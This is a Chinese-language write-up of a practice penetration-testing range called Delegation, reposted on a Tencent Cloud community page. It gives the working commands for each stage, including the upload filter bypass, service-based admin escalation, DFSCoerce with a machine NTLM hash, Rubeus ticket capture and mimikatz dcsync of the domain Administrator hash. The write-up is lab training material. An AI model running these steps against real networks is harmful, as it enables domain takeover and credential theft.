首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【打靶练习】Delegation

【打靶练习】Delegation

作者头像
YanXia
发布2025-07-13 10:19:51
发布2025-07-13 10:19:51
8200
代码可运行
举报
文章被收录于专栏:YX’blogYX’blog
运行总次数:0
代码可运行

0x00前言

Delegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。

77599-cqa7ip7r2oq.png
77599-cqa7ip7r2oq.png

入口

64194-wcg1x9e5sml.png
64194-wcg1x9e5sml.png

进入后台getshell

弱口令admin/123456

03201-yd78n3jrfd.png
03201-yd78n3jrfd.png

这里可以添加后缀。但是php不被允许,所以可以填phtml

2025-07-12T13:37:54.png
2025-07-12T13:37:54.png
2025-07-12T13:38:38.png
2025-07-12T13:38:38.png

经过测试发现是拦截了<?php ?> 这里去掉?>即可

2025-07-12T13:39:14.png
2025-07-12T13:39:14.png

提权

2025-07-12T13:39:26.png
2025-07-12T13:39:26.png
2025-07-12T13:40:47.png
2025-07-12T13:40:47.png

suid查到

2025-07-12T13:41:19.png
2025-07-12T13:41:19.png

这里有个diff可以suid提权以root权限读取

2025-07-12T13:41:49.png
2025-07-12T13:41:49.png

flag1

2025-07-12T13:43:08.png
2025-07-12T13:43:08.png

横向

这里给了个提示 Here is the hint: WIN19\Adrian 先看看本机网段,然后探测一下c段

2025-07-12T13:44:05.png
2025-07-12T13:44:05.png
代码语言:javascript
代码运行次数:0
运行
复制
172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.7:445 open
172.22.4.19:445 open
172.22.4.45:445 open
172.22.4.7:139 open
172.22.4.19:139 open
172.22.4.45:139 open
172.22.4.7:135 open
172.22.4.19:135 open
172.22.4.45:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.4.7    (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server

获得密码

根据提示,给的是win19的账户,所以现在爆破下他的密码 发现提示个过期密码

2025-07-12T14:09:28.png
2025-07-12T14:09:28.png
2025-07-12T14:09:34.png
2025-07-12T14:09:34.png

这里可以切rdesktop然后改个密码就好了

2025-07-12T14:09:42.png
2025-07-12T14:09:42.png

提权

2025-07-12T14:09:52.png
2025-07-12T14:09:52.png

发现权限比较高

2025-07-12T14:09:59.png
2025-07-12T14:09:59.png
2025-07-12T14:10:07.png
2025-07-12T14:10:07.png

按这样添加个管理员权限就好了 "C:\Windows\System32\cmd.exe" /c net localgroup administrators Adrian /add 然后启动服务 sc start gupdate

2025-07-12T14:10:45.png
2025-07-12T14:10:45.png

flag2

2025-07-12T14:11:24.png
2025-07-12T14:11:24.png

分析

先用mimikatz pth一下机器hash然后以机器账户的身份启个cmd去运行SharpHound.exe这样就能获取到域的信息 SharpHound.exe -c all -d xiaorang.lab (注意这里一定要-d不然dump下来的zip,bloodhound分析不了)

2025-07-12T14:11:38.png
2025-07-12T14:11:38.png

点击这个查找到无约束委派的最短路径

2025-07-12T14:12:00.png
2025-07-12T14:12:00.png

可以看到dc和win19都可以非约束委派

2025-07-12T14:12:11.png
2025-07-12T14:12:11.png

非约束委派

上传 Rubeus.exe 监听 TGTRubeus.exe monitor /interval:1 /filteruser:DC01然后本地运行DFSCoerce去强制dc进行身份验证。然后rubeus就收到了来自dc的TGTpython dfscoerce.py -u WIN19 -hashes :a91969d7ad569d8591027fa9d707b3ad -d xiaorang.lab win19 172.22.4.7导入Rubeus.exe ptt /ticket:klist查看已经成功存储到内存了然后直接dcsync获取administrator hashmimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:xiaorang\Administrator" "exit"

结束flag03-04

然后一个个去读flag就好了

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2025-07-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00前言
  • 入口
    • 进入后台getshell
    • 提权
    • flag1
  • 横向
    • 获得密码
    • 提权
    • flag2
    • 分析
    • 非约束委派
  • 结束flag03-04
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档